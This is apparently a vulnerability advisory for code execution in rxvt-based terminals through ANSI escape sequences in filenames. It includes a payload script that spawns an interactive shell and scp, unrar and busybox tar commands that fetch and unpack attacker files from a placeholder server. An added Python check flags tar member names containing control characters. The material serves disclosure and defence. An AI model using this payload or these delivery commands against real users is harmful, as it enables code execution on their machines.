(u)rxvt terminal (+bash) remoteish code execution 0day
Version: rxvt 2.7.10, rxvt-unicode 9.22
Author: def <def@huumeet.info>
Date: 2021-04-20
CVE: N/A
Prerequisites
rxvt, rxvt-unicode, mrxvt or some other rxvt-based terminal
bash shell. It is possible to target at least ksh as well, but zsh probably not
User interaction!
The victim must enter a command to run a program✱ that ...
plants attacker's payload file(s) in a subdirectory of the current directory
outputs text containing ANSI escape sequences which trigger the code execution
✱ Suitable programs include popular tools such as scp, unrar, git-clone ...
Payload (planted as ZZZ/0, ZZZ/1 and/or ZZZ/Z0 in the PoC exploits)
#!/bin/sh
uname -a && id && date && /bin/sh -i
scp -r exploit@server:/backup/ .
unrar x exploit.rar
busybox tar -xvf exploit.tar
Note: GNU tar is not exploitable due to proper escaping of ANSI escape sequences in filenames!
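The note above credits escaping of filenames for GNU tar not being affected. The following is an added example, not part of the original advisory or of any tool named in it: a pre-extraction check that lists tar members whose names contain control characters and prints them in escaped form. The function names, the octal escape style and the sample archive (which carries only a harmless colour sequence) are assumptions made for illustration.

```python
import io
import tarfile


def is_control(ch):
    """True for C0 controls (including ESC), DEL and C1 controls (including 8-bit CSI)."""
    cp = ord(ch)
    return cp < 0x20 or cp == 0x7F or 0x80 <= cp <= 0x9F


def escape_name(name):
    """Return a form of name that is safe to print: control characters become
    octal escapes, and backslash is doubled so the output stays unambiguous."""
    out = []
    for ch in name:
        if ch == "\\":
            out.append("\\\\")
        elif is_control(ch):
            out.append("\\%03o" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def suspicious_members(fileobj):
    """Return the escaped names of members whose names contain control characters."""
    flagged = []
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar:
            if any(is_control(ch) for ch in member.name):
                flagged.append(escape_name(member.name))
    return flagged


def build_sample_archive():
    """Constructed sample: one ordinary name and one name carrying a colour (SGR) sequence."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in ("docs/readme.txt", "docs/\x1b[31mred\x1b[0m.txt"):
            tar.addfile(tarfile.TarInfo(name), io.BytesIO(b""))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for name in suspicious_members(build_sample_archive()):
        print("control characters in member name:", name)
```

Running the check before extracting, and before listing the archive with a tool that echoes names raw, keeps the escape bytes from ever reaching the terminal.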